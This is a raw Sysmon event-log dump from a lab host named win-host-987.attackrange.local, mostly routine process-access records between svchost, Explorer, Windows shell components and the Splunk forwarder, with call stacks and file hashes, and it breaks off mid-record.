10341000x800000000000000035129251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.598{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.598{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.598{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.598{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8445-613A-F796-03000000C801}532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.598{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8445-613A-F796-03000000C801}532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.594{B81B27B7-8445-613A-F796-03000000C801}532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D404A1BFDB26B6EA0A8C6A836C31634,SHA256=8895F0B6D0411338006A349B9EC56E4A8E5969CA46345A6E559532D9D06E7E41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD7BAA0C1975D7CB3A5CBB96351C3B8A,SHA256=36EFE1FA4CD59F9D06C9D890F8B03358A7C2982623E63C33C4307E2CB469EF8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 